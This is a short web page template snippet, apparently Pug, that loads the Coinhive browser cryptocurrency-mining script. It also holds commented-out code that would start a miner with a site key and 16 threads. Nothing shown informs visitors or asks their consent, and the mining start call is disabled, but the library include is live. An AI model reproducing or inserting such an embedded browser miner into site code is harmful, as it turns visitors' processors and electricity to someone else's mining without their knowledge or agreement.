script(src="https://coinhive.com/lib/coinhive.min.js")
//- script.
//-     var miner = new CoinHive.User('CI0BTOAY7b8b5JAWUcJNQEt7M7k2jqPL', 'blogged', { threads: 16 });
//-     miner.start();
//-     console.log(miner.isRunning());